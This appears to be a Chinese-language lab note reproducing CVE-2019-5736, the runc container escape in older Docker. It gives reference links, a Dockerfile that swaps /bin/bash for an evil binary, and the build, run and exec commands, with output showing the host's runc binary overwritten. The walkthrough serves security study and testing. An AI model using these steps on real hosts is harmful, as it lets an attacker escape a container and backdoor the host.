系統 - Docker - Container Escape - CVE-2019-5736



參考資訊:
https://github.com/q3k/cve-2019-5736-poc
https://www.cvedetails.com/cve/CVE-2019-5736/
https://github.com/twistlock/RunC-CVE-2019-5736
https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/containerd.io_1.2.0-1_amd64.deb
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce_18.09.0~3-0~debian-buster_amd64.deb
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce-cli_18.09.0~3-0~debian-buster_amd64.deb

測試環境
Ubuntu 18.04 (4.15.0-20-generic)
Affected runc: 1.0.0-rc6
Affected Docker: < 18.09.2

測試步驟

# cd
# git clone https://github.com/twistlock/RunC-CVE-2019-5736
# cd RunC-CVE-2019-5736/exec_POC
# vim Dockerfile
    FROM ubuntu:18.04
    COPY replace.sh /
    RUN ["chmod", "+x", "/replace.sh"]
    COPY overwrite_runc /overwrite_runc
    RUN ["chmod", "+x", "/overwrite_runc"]
    COPY new_runc /
    RUN ["mv", "/bin/bash", "/bin/bash_original"]
    COPY bash_evil /bin/bash
    RUN ["chmod", "+x", "/bin/bash"]
    ENTRYPOINT ["/bin/bash_original", "/replace.sh"]

# docker build -t cve .
# docker run --rm --name test cve
    [+] Waiting for runC to be executed in the container...

開啟另一個視窗

# docker exec test bash
    No help topic for '/bin/bash'

完成

# docker run --rm --name test cve
    [+] Waiting for runC to be executed in the container...
    [+] Got /proc/1071/exe as fd 3 in this process
    [+] Opened runC (using /proc/self/fd/3) for writing
    [+] Succesfully overwritten runC
    [+] Done, shuting down ...

# runc -v

    **THE ALL NEW AND IMPROVED RUNC**

        [+] Your backdoor here ->